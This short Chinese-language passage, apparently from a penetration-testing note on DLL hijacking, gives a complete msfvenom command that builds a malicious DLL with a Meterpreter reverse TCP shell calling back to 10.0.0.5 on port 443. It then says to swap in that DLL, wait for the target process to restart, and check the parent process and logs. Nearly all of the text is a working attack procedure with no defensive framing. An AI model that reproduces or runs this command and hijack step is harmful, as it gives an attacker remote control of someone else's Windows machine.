首先,在kali下使用msfvenom生成恶意的dll文件(shellcode为反弹shell的shellcode)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll
然后替换dll,等待目标进程重启。
查看父进程无和日志。